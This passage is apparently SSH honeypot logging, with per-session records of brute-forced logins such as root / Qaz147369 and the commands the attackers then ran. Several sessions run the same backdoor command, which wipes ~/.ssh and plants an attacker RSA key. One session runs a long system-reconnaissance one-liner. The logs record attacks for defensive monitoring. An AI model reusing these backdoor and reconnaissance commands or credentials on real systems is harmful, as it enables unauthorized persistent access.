    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
2.57.122.150
2026-06-30 16:39:38.042078 UTC
COMMANDS RUN RECONNAISSANCE SUCCESSFUL LOGIN SCORE: 200

Credential acceptance event recorded. Target authentication: root / !root

Remote entity achieved interactive shell state. Command sequence (9 executed):

[obs-node]:~$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output"
[obs-node]:~$ uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /bin/uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ /usr/bin/uname -s -v -n -m 2 > /dev/null
Command not found: /usr/bin/uname -s -v -n -m
[obs-node]:~$ busybox uname -s -v -n -m 2 > /dev/null
[obs-node]:~$ ( [ -f /proc/version ]
[obs-node]:~$ [ -f /proc/version ]
[obs-node]:~$ head -1 /proc/version | cut -d -f1
[obs-node]:~$ [ -f /etc/os-release ]
Record ID: ecd0b3832ce9
Client Version: SSH-2.0-Go
Engagement Duration: 1.3s
HASSH Fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5
{
  "id": "ecd0b3832ce9",
  "src_ip": "2.57.122.150",
  "start_time": "2026-06-30T16:39:38.042078Z",
  "end_time": "2026-06-30T16:39:39.332934Z",
  "duration": "1.3",
  "version": "SSH-2.0-Go",
  "hassh": "2ec37a7cc8daf20b10e1ad6221061ca5",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "!root"
  },
  "commands": [
    "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
    "uname -s -v -n -m 2 > /dev/null",
    "/bin/uname -s -v -n -m 2 > /dev/null",
    "/usr/bin/uname -s -v -n -m 2 > /dev/null",
    "busybox uname -s -v -n -m 2 > /dev/null",
    "( [ -f /proc/version ]",
    "[ -f /proc/version ]",
    "head -1 /proc/version | cut -d -f1",
    "[ -f /etc/os-release ]"
  ],
  "detailed_commands": [
    {
      "cmd": "export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '\"' ) || echo \"\"); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q \"lm\" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 8\" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q \"CPU architecture: 7\" /proc/cpuinfo && echo armv7l ) || echo \"\"); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c \"^processor\" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E \"model name|Hardware\" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep \"Model name\"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\\n'; echo '===DONE===' ) 2>&1 ); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"LAST:$last_output\"; echo \"FILTER:$filter_output\"",
      "failed": false,
      "error": null
    },
    {
      "cmd": "uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "/usr/bin/uname -s -v -n -m 2 > /dev/null",
      "failed": true,
      "error": "Command not found: /usr/bin/uname -s -v -n -m"
    },
    {
      "cmd": "busybox uname -s -v -n -m 2 > /dev/null",
      "failed": false,
      "error": null
    },
    {
      "cmd": "( [ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /proc/version ]",
      "failed": false,
      "error": null
    },
    {
      "cmd": "head -1 /proc/version | cut -d -f1",
      "failed": false,
      "error": null
    },
    {
      "cmd": "[ -f /etc/os-release ]",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "/usr/bin/uname -s -v -n -m"
  ],
  "score": 200,
  "tags": [
    "COMMANDS RUN",
    "RECONNAISSANCE",
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:38:28.260571 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: bac7c1cee115
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 0.9s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "bac7c1cee115",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:38:28.260571Z",
  "end_time": "2026-06-30T16:38:29.136577Z",
  "duration": "0.9",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:38:26.280393 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: 718dcb3a39e2
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 1.9s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "718dcb3a39e2",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:38:26.280393Z",
  "end_time": "2026-06-30T16:38:28.134386Z",
  "duration": "1.9",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:38:24.395022 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / Pw@123456

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: e723426a4c04
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 4.7s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "e723426a4c04",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:38:24.395022Z",
  "end_time": "2026-06-30T16:38:29.133633Z",
  "duration": "4.7",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "Pw@123456"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:35:18.005638 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: root / 3245gs5662d34

Record ID: de5151ad2592
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 1.0s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "de5151ad2592",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:35:18.005638Z",
  "end_time": "2026-06-30T16:35:19.053001Z",
  "duration": "1.0",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:35:16.010373 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: b877f4cb4b4c
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 1.9s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "b877f4cb4b4c",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:35:16.010373Z",
  "end_time": "2026-06-30T16:35:17.863995Z",
  "duration": "1.9",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:35:13.985100 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: root / Qaz147369

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 14149db9f003
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 5.1s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "14149db9f003",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:35:13.985100Z",
  "end_time": "2026-06-30T16:35:19.056101Z",
  "duration": "5.1",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "root",
    "pass": "Qaz147369"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
124.45.35.17
2026-06-30 16:32:02.916639 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: sftpuser

Record ID: a530f7646f9c
Client Version: SSH-2.0-libssh_0.11.1
Engagement Duration: 1.8s
HASSH Fingerprint: 03a80b21afa810682a776a7d42e5e6fb
{
  "id": "a530f7646f9c",
  "src_ip": "124.45.35.17",
  "start_time": "2026-06-30T16:32:02.916639Z",
  "end_time": "2026-06-30T16:32:04.747641Z",
  "duration": "1.8",
  "version": "SSH-2.0-libssh_0.11.1",
  "hassh": "03a80b21afa810682a776a7d42e5e6fb",
  "attempts": [
    {
      "user": "sftpuser",
      "pass": "12345"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
189.113.47.155
2026-06-30 16:30:42.850449 UTC
SUCCESSFUL LOGIN SCORE: 50

Credential acceptance event recorded. Target authentication: user / 3245gs5662d34

Record ID: 047f1819bee4
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 1.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "047f1819bee4",
  "src_ip": "189.113.47.155",
  "start_time": "2026-06-30T16:30:42.850449Z",
  "end_time": "2026-06-30T16:30:43.925583Z",
  "duration": "1.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "user",
    "pass": "3245gs5662d34"
  },
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 50,
  "tags": [
    "SUCCESSFUL LOGIN"
  ]
}
189.113.47.155
2026-06-30 16:30:40.626685 UTC
FAILED LOGIN SCORE: 0

Unauthorized authentication attempt escalated. Dictionary traversal detected (1 distinct queries). Vector identities: 345gs5662d34

Record ID: 154d8b0e54b5
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 2.1s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "154d8b0e54b5",
  "src_ip": "189.113.47.155",
  "start_time": "2026-06-30T16:30:40.626685Z",
  "end_time": "2026-06-30T16:30:42.681863Z",
  "duration": "2.1",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [
    {
      "user": "345gs5662d34",
      "pass": "345gs5662d34"
    }
  ],
  "success_login": false,
  "success_credential": null,
  "commands": [],
  "detailed_commands": [],
  "failed_commands": [],
  "score": 0,
  "tags": [
    "FAILED LOGIN"
  ]
}
189.113.47.155
2026-06-30 16:30:38.362207 UTC
COMMANDS RUN SUCCESSFUL LOGIN SCORE: 80

Credential acceptance event recorded. Target authentication: user / asdfg

Remote entity achieved interactive shell state. Command sequence (2 executed):

[obs-node]:~$ cd ~; chattr -ia .ssh; lockr -ia .ssh
Command not found: lockr -ia .ssh
[obs-node]:~$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
Record ID: 506f7dbd9f03
Client Version: SSH-2.0-libssh_0.9.6
Engagement Duration: 5.6s
HASSH Fingerprint: f555226df1963d1d3c09daf865abdc9a
{
  "id": "506f7dbd9f03",
  "src_ip": "189.113.47.155",
  "start_time": "2026-06-30T16:30:38.362207Z",
  "end_time": "2026-06-30T16:30:43.922533Z",
  "duration": "5.6",
  "version": "SSH-2.0-libssh_0.9.6",
  "hassh": "f555226df1963d1d3c09daf865abdc9a",
  "attempts": [],
  "success_login": true,
  "success_credential": {
    "user": "user",
    "pass": "asdfg"
  },
  "commands": [
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~"
  ],
  "detailed_commands": [
    {
      "cmd": "cd ~; chattr -ia .ssh; lockr -ia .ssh",
      "failed": true,
      "error": "Command not found: lockr -ia .ssh"
    },
    {
      "cmd": "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~",
      "failed": false,
      "error": null
    }
  ],
  "failed_commands": [
    "lockr -ia .ssh"
  ],
  "score": 80,
  "tags": [
    "COMMANDS RUN",
    "SUCCESSFUL LOGIN"
  ]
}
